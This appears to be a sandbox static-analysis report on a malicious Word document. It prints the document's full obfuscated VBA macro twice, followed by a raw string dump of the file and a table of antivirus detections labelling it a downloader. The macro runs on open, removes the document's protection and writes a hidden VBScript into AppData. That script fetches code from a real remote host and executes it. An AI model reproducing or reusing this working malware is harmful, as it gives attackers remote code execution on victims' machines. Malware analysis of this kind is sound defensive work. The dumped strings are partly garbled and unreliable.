Static | ZeroBOX

Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Const gwKlzhTNl = "JLkRKSVnjtI" Function xkLRDglH(kDZJIuB) MsgBox "TsTvcarcLZ" xkLRDglH = kDZJIuB End Function If gwKlzhTNl = "CaHyMKWikKylZZJ" Then Const xGm = "UKQIe" Else Const xGm = "" End If If gwKlzhTNl = "mseQSbcAFCrUMy" Then Const mzmb = "GBgFy" Else Const mzmb = "" End If If gwKlzhTNl = "bSxLpArGJhEPOR" Then Const xl = "nhIWU" Else Const xl = "" End If If gwKlzhTNl = "BCFpFdqcalmJ" Then Const LNxST = "AGauS" Else Const LNxST = "" End If #If gwKlzhTNl <> "sIlLrctOERyij" Then Sub ViewPage(nShape) On Error Resume Next Set doc = ActiveDocument Set sel = doc.Shapes(nShape) sel.Fill.Solid sel.Delete For ViewMode = 10 To 0 Step -1 ActiveWindow.View.SeekView = ViewMode With Selection .WholeStory .Font.Hidden = False .Collapse End With Next End Sub Sub MainPage(bret) fn = FreeFile ui = "miracl" & xGm & "e.de" & mzmb & "signso" & xGm & "up." & xGm & "co.kr" & LNxST & "/us" & LNxST & "er/" & LNxST & "views" & xGm & "/resor" & LNxST & "t/cont" & LNxST & "rolle" & mzmb & "r/css/" & xl & "upd" & mzmb & "ate" rp = Environ("appd" & mzmb & "ata") & "\Mi" & mzmb & "cros" & xl & "oft\" & mzmb & "Off" & mzmb & "ice\v" & mzmb & "ersio" & xGm & "n.xm" & xl & "l" Open rp For Output As #fn hs = "On " & mzmb & "Error" & xl & " Re" & xGm & "sume " & xl & "Next:" & mzmb & "Set " & mzmb & "opst=" & LNxST & "Create" & mzmb & "Obj" & mzmb & "ect(" mids = "MSXML2" & mzmb & ".Serv" & xGm & "erXML" & LNxST & "HTTP." & mzmb & "6.0" hs = hs & """" & mids & """" mids = "):ops" & LNxST & "t.o" & xGm & "pen " hs = hs & mids & """" mids = "GET" hs = hs & mids & """," & """" mids = "http" & mzmb & "://xx" & mzmb & "x/lis" & xl & "t.php" & xGm & "?quer" & mzmb & "y=1" mids = Replace(mids, "xxx", ui) ts = ", Fals" & xGm & "e:o" & LNxST & "pst.Se" & xGm & "nd:E" & xl & "xecu" & LNxST & "te(op" & xGm & "st.res" & xGm & "pon" & mzmb & "seText" & xGm & ")" hs = hs & mids & """" & ts Print #fn, hs bret = False Close #fn Shell "wscri" & mzmb & "pt.e" & xl & "xe //" & xl & "e:vb" & mzmb & "scrip" & xl & "t //b " & rp, vbHide End Sub Sub AutoOpen() On Error Resume Next Application.ActiveWindow.View.Type = wdPrintView Set wnd = ActiveDocument wnd.Unprotect "1qaz" & xGm & "2ws" & mzmb & "x" ViewPage ("pic") wnd.Save MainPage (True) End Sub #End If

Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Const gwKlzhTNl = "JLkRKSVnjtI" Function xkLRDglH(kDZJIuB) MsgBox "TsTvcarcLZ" xkLRDglH = kDZJIuB End Function If gwKlzhTNl = "CaHyMKWikKylZZJ" Then Const xGm = "UKQIe" Else Const xGm = "" End If If gwKlzhTNl = "mseQSbcAFCrUMy" Then Const mzmb = "GBgFy" Else Const mzmb = "" End If If gwKlzhTNl = "bSxLpArGJhEPOR" Then Const xl = "nhIWU" Else Const xl = "" End If If gwKlzhTNl = "BCFpFdqcalmJ" Then Const LNxST = "AGauS" Else Const LNxST = "" End If #If gwKlzhTNl <> "sIlLrctOERyij" Then Sub ViewPage(nShape) On Error Resume Next Set doc = ActiveDocument Set sel = doc.Shapes(nShape) sel.Fill.Solid sel.Delete For ViewMode = 10 To 0 Step -1 ActiveWindow.View.SeekView = ViewMode With Selection .WholeStory .Font.Hidden = False .Collapse End With Next End Sub Sub MainPage(bret) fn = FreeFile ui = "miracl" & xGm & "e.de" & mzmb & "signso" & xGm & "up." & xGm & "co.kr" & LNxST & "/us" & LNxST & "er/" & LNxST & "views" & xGm & "/resor" & LNxST & "t/cont" & LNxST & "rolle" & mzmb & "r/css/" & xl & "upd" & mzmb & "ate" rp = Environ("appd" & mzmb & "ata") & "\Mi" & mzmb & "cros" & xl & "oft\" & mzmb & "Off" & mzmb & "ice\v" & mzmb & "ersio" & xGm & "n.xm" & xl & "l" Open rp For Output As #fn hs = "On " & mzmb & "Error" & xl & " Re" & xGm & "sume " & xl & "Next:" & mzmb & "Set " & mzmb & "opst=" & LNxST & "Create" & mzmb & "Obj" & mzmb & "ect(" mids = "MSXML2" & mzmb & ".Serv" & xGm & "erXML" & LNxST & "HTTP." & mzmb & "6.0" hs = hs & """" & mids & """" mids = "):ops" & LNxST & "t.o" & xGm & "pen " hs = hs & mids & """" mids = "GET" hs = hs & mids & """,""" mids = "http" & mzmb & "://xx" & mzmb & "x/lis" & xl & "t.php" & xGm & "?quer" & mzmb & "y=1" mids = Replace(mids, "xxx", ui) ts = ", Fals" & xGm & "e:o" & LNxST & "pst.Se" & xGm & "nd:E" & xl & "xecu" & LNxST & "te(op" & xGm & "st.res" & xGm & "pon" & mzmb & "seText" & xGm & ")" hs = hs & mids & """" & ts Print #fn, hs bret = False Close #fn Shell "wscri" & mzmb & "pt.e" & xl & "xe //" & xl & "e:vb" & mzmb & "scrip" & xl & "t //b " & rp, vbHide End Sub Sub AutoOpen() On Error Resume Next Application.ActiveWindow.View.Type = wdPrintView Set wnd = ActiveDocument wnd.Unprotect "1qaz" & xGm & "2ws" & mzmb & "x" ViewPage ("pic") wnd.Save MainPage (True) End Sub #End If

[Content_Types].xml

_rels/.rels

theme/theme/themeManager.xml

theme/theme/theme1.xml

/,EE\}

theme/theme/_rels/themeManager.xml.rels

K(M&$R(.1

[Content_Types].xmlPK

_rels/.relsPK

theme/theme/themeManager.xmlPK

theme/theme/theme1.xmlPK

theme/theme/_rels/themeManager.xml.relsPK

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>

Normal

george

Microsoft Office Word

Project

\G{00020

0046}#

2.0#0#C:

\Windows

\System3

e2.tlb

#OLE Aut

omation

ENormal

!Offic

DF8D04C-

5BFA-101@B-BDE5

ram File

s\Common

Microso

ft Share

d\OFFICE

15\MSO.D

M 15 .0 Ob

ibrary

BeThisDo

cumentG

JLkRKSVnjtI

TsTvcarcLZA@4

CaHyMKWikKylZZJ

mseQSbcAFCrUMy

bSxLpArGJhEPOR

BCFpFdqcalmJ

sIlLrctOERyij

miracl

signso

/resor

t/cont

r/css/

Create

MSXML2

, Fals

pst.Se

st.res

seText

t //b

Attribut

e VB_Nam

e = "Thi

sDocumen

1Normal

VGlobal!

Pre decla

lateDeri

$Custom

t gwKlzh

KSVnjtI

Functi

on xkLRD

glH(kDZJ

@MsgBox

TvcarcLZ

>CaHyM

KWikKylZ

ZJ" Then#

QSbcAFCr

bSxLpAr

GJhEPOR

ZnhIWU

BCFpFd qcalm

1AGau.SP

"sIlLrc

tOERyij

Sub Vi

ewPage(n Shape

Error R

pSet doce@%A

.Fill.So

Dellet

0 Step

.Se|ek

.WholeS

t.Hidden

.MaiBn

"miracl

" & !g& "pe.de

s ignso

nviron("Dap

ice\v!

ersii&n.,xm

ROutpu

t As #f

MSXML2

te(oqi

seT`\}

Print!/x, h$

w1Shell@ "wscr*;p

+C6xe /

rpp, vbPY`R

uto1;(

Applicaa

ot08 "1qafz

` ("pi

Win64x

stdole

Project-

ThisDocument<

_Evaluate

Normal

Office

Documentj

gwKlzhTNl

xkLRDglHS

kDZJIuB

MsgBox

ViewPage

nShape

ActiveDocument

Shapes

Delete

ViewModeHDP

ActiveWindow

SeekView$

SelectionZ

WholeStory

Hidden]

Collapse

MainPager1P

Environ

Replacef

ShellV

vbHide

AutoOpen

Application

wdPrintView(

Unprotect

ID="{00000000-0000-0000-0000-000000000000}"

Document=ThisDocument/&H00000000

HelpFile=""

Name="Project"

HelpContextID="0"

VersionCompatible32="393222000"

CMG="1715BB935FB7B5BBB5BBB1BFB1BF"

DPB="696BC50AE20AE2F51E0BE2B8E2FE816E2B9F8552FC55BDFEF41ECF01D6D0E1DABE106CFA"

GC="BBB917376838683868"

[Host Extender Info]

&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000

[Workspace]

ThisDocument=26, 26, 241, 532, Z

ThisDocument

Microsoft Word 97-2003 Document

MSWordDoc

Word.Document.8

Normal

Default Paragraph Font

Table Normal

No List

Header

Header Char

Footer

Footer Char

Project.ThisDocument.AutoOpen

PROJECT.THISDOCUMENT.AUTOOPEN

Unknown

Times New Roman

Symbol

Malgun Gothic

Malgun Gothic Semilight

Cambria Math

!%),.:;?]}

george

Root Entry

1Table

WordDocument

SummaryInformation

DocumentSummaryInformation

Macros

*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications

*\G{00020905-0000-0000-C000-000000000046}#8.6#0#C:\Program Files\MicrosoThisDocument

_VBA_PROJECT

PROJECT

PROJECTwm

(1Normal.ThisDocument

ft Office\Office15\MSWORD.OLB#Microsoft Word 15.0 Object Library

*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\System32\stdole2.tlb#OLE Automation

*\CNormal

*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE15\MSO.DLL#Microsoft Office 15.0 Object Library

ThisDocument

0361e6e3e9

ThisDocument

tThisDocument

CompObj

Antivirus	Signature
Bkav	Clean
Lionic	Trojan.MSWord.SLoad.4!c
Elastic	malicious (high confidence)
DrWeb	Clean
MicroWorld-eScan	VB.Heur2.EmoDldr.6.8FDE8573.Gen
FireEye	VB.Heur2.EmoDldr.6.8FDE8573.Gen
CAT-QuickHeal	Clean
ALYac	VB.Heur2.EmoDldr.6.8FDE8573.Gen
Malwarebytes	Clean
Zillya	Clean
Sangfor	Malware.Generic-Macro.Save.4cb6547c
K7AntiVirus	Clean
K7GW	Clean
Arcabit	VB.Heur2.EmoDldr.6.8FDE8573.Gen
BitDefenderTheta	Clean
VirIT	Clean
Cyren	Clean
Symantec	Trojan.Gen.NPE
ESET-NOD32	VBA/TrojanDownloader.Agent.VHA
TrendMicro-HouseCall	TROJ_FRS.0NA103GT21
Avast	Script:SNH-gen [Drp]
ClamAV	Clean
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	VB.Heur2.EmoDldr.6.8FDE8573.Gen
NANO-Antivirus	Trojan.Ole2.Vbs-heuristic.druvzi
SUPERAntiSpyware	Clean
Tencent	Trojan.MsOffice.MacroS.11002729
TACHYON	Suspicious/W97M.DRP.Gen
Sophos	Troj/DocDl-ADYY
F-Secure	Malware.W97M/Agent.8327111
Baidu	Clean
VIPRE	VB.Heur2.EmoDldr.6.8FDE8573.Gen
TrendMicro	TROJ_FRS.0NA103GT21
McAfee-GW-Edition	BehavesLike.OLE2.Downloader.px
CMC	Clean
Emsisoft	VB.Heur2.EmoDldr.6.8FDE8573.Gen (B)
SentinelOne	Static AI - Malicious OLE
Jiangmin	Clean
Google	Detected
Avira	W97M/Agent.8327111
Antiy-AVL	Trojan/MSOffice.SAgent.gen
Gridinsoft	Clean
Xcitium	Clean
Microsoft	TrojanDownloader:O97M/Obfuse!MTB
ViRobot	DOC.Z.Agent.41472.CHX
ZoneAlarm	HEUR:Trojan-Downloader.VBS.SLoad.gen
GData	VB.Heur2.EmoDldr.6.8FDE8573.Gen
Cynet	Malicious (score: 99)
AhnLab-V3	Clean
Acronis	suspicious
McAfee	W97M/Downloader.dkh
MAX	malware (ai score=82)
VBA32	Clean
Zoner	Clean
Rising	Downloader.Agent!8.B23 (TOPIS:E0:N2Rj37hPkdP)
Yandex	Clean
Ikarus	Trojan-Downloader.VBA.Agent
MaxSecure	Clean
Fortinet	VBA/Agent.8372!tr
AVG	Script:SNH-gen [Drp]
Panda	Clean

Antivirus

Signature

Bkav

Clean

Lionic

Trojan.MSWord.SLoad.4!c

Elastic

malicious (high confidence)

DrWeb

Clean

MicroWorld-eScan

VB.Heur2.EmoDldr.6.8FDE8573.Gen

FireEye

VB.Heur2.EmoDldr.6.8FDE8573.Gen

CAT-QuickHeal

Clean

ALYac

VB.Heur2.EmoDldr.6.8FDE8573.Gen

Malwarebytes

Clean

Zillya

Clean

Sangfor

Malware.Generic-Macro.Save.4cb6547c

K7AntiVirus

Clean

K7GW

Clean

Arcabit

VB.Heur2.EmoDldr.6.8FDE8573.Gen

BitDefenderTheta

Clean

VirIT

Clean

Cyren

Clean

Symantec

Trojan.Gen.NPE

ESET-NOD32

VBA/TrojanDownloader.Agent.VHA

TrendMicro-HouseCall

TROJ_FRS.0NA103GT21

Avast

Script:SNH-gen [Drp]

ClamAV

Clean

Kaspersky

UDS:DangerousObject.Multi.Generic

BitDefender

VB.Heur2.EmoDldr.6.8FDE8573.Gen

NANO-Antivirus

Trojan.Ole2.Vbs-heuristic.druvzi

SUPERAntiSpyware

Clean

Tencent

Trojan.MsOffice.MacroS.11002729

TACHYON

Suspicious/W97M.DRP.Gen

Sophos

Troj/DocDl-ADYY

F-Secure

Malware.W97M/Agent.8327111

Baidu

Clean

VIPRE

VB.Heur2.EmoDldr.6.8FDE8573.Gen

TrendMicro

TROJ_FRS.0NA103GT21

McAfee-GW-Edition

BehavesLike.OLE2.Downloader.px

CMC

Clean

Emsisoft

VB.Heur2.EmoDldr.6.8FDE8573.Gen (B)

SentinelOne

Static AI - Malicious OLE

Jiangmin

Clean

Google

Detected

Avira

W97M/Agent.8327111

Antiy-AVL

Trojan/MSOffice.SAgent.gen

Gridinsoft

Clean

Xcitium

Clean

Microsoft

TrojanDownloader:O97M/Obfuse!MTB

ViRobot

DOC.Z.Agent.41472.CHX

ZoneAlarm

HEUR:Trojan-Downloader.VBS.SLoad.gen

GData

VB.Heur2.EmoDldr.6.8FDE8573.Gen

Cynet

Malicious (score: 99)

AhnLab-V3

Clean

Acronis

suspicious

McAfee

W97M/Downloader.dkh

MAX

malware (ai score=82)

VBA32

Clean

Zoner

Clean

Rising

Downloader.Agent!8.B23 (TOPIS:E0:N2Rj37hPkdP)

Yandex

Clean

Ikarus

Trojan-Downloader.VBA.Agent

MaxSecure

Clean

Fortinet

VBA/Agent.8372!tr

AVG

Script:SNH-gen [Drp]

Panda

Clean

Static Analysis

Original

Deobfuscated